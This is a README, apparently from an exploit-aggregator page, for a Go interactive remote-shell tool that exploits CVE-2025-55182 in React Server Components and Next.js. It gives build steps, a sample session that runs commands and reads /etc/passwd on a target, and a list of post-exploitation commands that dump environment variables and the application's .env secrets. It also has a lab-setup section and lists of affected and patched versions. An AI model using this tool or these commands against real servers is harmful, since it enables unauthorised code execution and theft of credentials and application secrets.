Share
## https://sploitus.com/exploit?id=8E9A69E3-6BE6-535B-B381-83A623ADD927
# ๐Ÿ‘ป CVE-2025-55182

> Interactive RCE exploitation tool for CVE-2025-55182 (React Server Components)

[![GitHub Stars](https://img.shields.io/github/stars/Hghost0x00/ghost-scanner?style=social)](https://github.com/Hghost0x00)
[![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE)
[![Go](https://img.shields.io/badge/Go-1.18+-blue.svg)](https://golang.org/dl/)

## ๐ŸŽฏ What Is This?

**CVE-2025-55182** is a minimal, interactive RCE exploitation tool targeting **CVE-2025-55182**, a critical vulnerability in React Server Components (RSC) affecting React 19.0.0 - 19.2.0 and Next.js applications.

**Features:**
- ๐Ÿ”ฅ Interactive shell with command execution
- ๐Ÿ‘ป Clean, hacker-style CLI interface
- ๐ŸŽฏ Automatic vulnerability detection
- ๐Ÿ“ค Real-time command output extraction
- โšก Zero dependencies (pure Go stdlib)

---

## ๐Ÿ“ฆ Installation

### Prerequisites
- Go 1.18 or higher
- A vulnerable target running React 19.0.0 - 19.2.0

### Build from source
```bash
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go
```

---

## ๐Ÿš€ Usage

### Basic Usage
```bash
./ghost-scanner
```

### Interactive Session
```
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
โ•ฒ_   ___ โ•ฒ   โ•ฒ โ•ฑ   โ•ฑโ•ฒ_   _____โ•ฑ         โ•ฒ_____  โ•ฒ   _  โ•ฒ  โ•ฒ_____  โ•ฒ  โ”‚   ____โ•ฑ          โ”‚   ____โ•ฑโ”‚   ____โ•ฑ_   โ”‚โ•ฑ  __  โ•ฒ โ•ฒ_____  โ•ฒ 
โ•ฑ    โ•ฒ  โ•ฒโ•ฑโ•ฒ   Y   โ•ฑ  โ”‚    __)_   ______  โ•ฑ  ____โ•ฑ  โ•ฑ_โ•ฒ  โ•ฒ  โ•ฑ  ____โ•ฑ  โ”‚____  โ•ฒ   ______  โ”‚____  โ•ฒ โ”‚____  โ•ฒ โ”‚   โ”‚>      <  โ•ฑ  ____โ•ฑ 
โ•ฒ     โ•ฒ____โ•ฒ     โ•ฑ   โ”‚        โ•ฒ โ•ฑ_____โ•ฑ โ•ฑ       โ•ฒ  โ•ฒ_โ•ฑ   โ•ฒโ•ฑ       โ•ฒ  โ•ฑ       โ•ฒ โ•ฑ_____โ•ฑ  โ•ฑ       โ•ฒโ•ฑ       โ•ฒโ”‚   โ•ฑ   โ”€โ”€   โ•ฒโ•ฑ       โ•ฒ 
 โ•ฒ______  โ•ฑ โ•ฒ___โ•ฑ   โ•ฑ_______  โ•ฑ         โ•ฒ_______ โ•ฒ_____  โ•ฑโ•ฒ_______ โ•ฒโ•ฑ______  โ•ฑ         โ•ฑ______  โ•ฑ______  โ•ฑโ”‚___โ•ฒ______  โ•ฑโ•ฒ_______ โ•ฒ
        โ•ฒโ•ฑ                  โ•ฒโ•ฑ                  โ•ฒโ•ฑ     โ•ฒโ•ฑ         โ•ฒโ•ฑ       โ•ฒโ•ฑ                 โ•ฒโ•ฑ       โ•ฒโ•ฑ            โ•ฒโ•ฑ         โ•ฒโ•ฑ  

    React2Shell RCE | CVE-2025-55182
    @hghost010

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
[?] Target: localhost:3000
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
[+] VULNERABLE
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit
```

---

## ๐ŸŽฅ Demo

Comming SOon..

---

**Affected Versions:**
- React 19.0.0, 19.1.0, 19.1.1, 19.2.0
- Next.js applications using these React versions

**Patched Versions:**
- React 19.2.1+
- Next.js with updated React dependency

---

## ๐Ÿงช Testing Lab Setup

Want to test this safely? Set up a vulnerable lab environment:

```bash
# Clone vulnerable Next.js app
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Install and run
npm install --legacy-peer-deps
npm run dev

# In another terminal, run ghost-scanner
./ghost-scanner
# Enter: localhost:3000
```

---

## ๐Ÿ“š Common Commands

```bash
ghost@rce $ id                    # Check user privileges
ghost@rce $ whoami                # Current username
ghost@rce $ pwd                   # Current directory
ghost@rce $ ls -la                # List files
ghost@rce $ cat /etc/passwd       # Read files
ghost@rce $ uname -a              # System information
ghost@rce $ env                   # Environment variables
ghost@rce $ ps aux                # Running processes
ghost@rce $ netstat -tulpn        # Network connections
ghost@rce $ cat /app/.env         # Application secrets
```

---

## ๐Ÿ“Š Repository Stats

![GitHub repo size](https://img.shields.io/github/repo-size/Hghost0x00/ghost-scanner)
![GitHub last commit](https://img.shields.io/github/last-commit/Hghost0x00/ghost-scanner)
![GitHub issues](https://img.shields.io/github/issues/Hghost0x00/ghost-scanner)

---

## ๐Ÿ”— References

- [CVE-2025-55182 Details](https://cloud.projectdiscovery.io/library/CVE-2025-55182)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
- [Original PoC by maple3142](https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3)
- [Assetnote Research](https://github.com/assetnote/react2shell-scanner)
- [Vulnerable Test App](https://github.com/zack0x01/vuln-app-CVE-2025-55182)

---

## ๐Ÿ’ฌ Community & Support

- ๐Ÿฆ **Twitter/X:** [@hghost010](https://x.com/hghost010)
- ๐Ÿ™ **GitHub:** [Hghost0x00](https://github.com/Hghost0x00)

**Found a bug?** Open an issue  
**Have questions?** Drop a comment on YouTube

---

## โญ Show Your Support

If this tool helped you:
- โญ **Star this repository**
- ๐Ÿ“บ **Subscribe to the channel**
- ๐Ÿ’ฌ **Share with others**

---

## ๐Ÿ“ License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

---

**Made with ๐Ÿ‘ป by Hghost0x00**  
**Happy hacking โšก**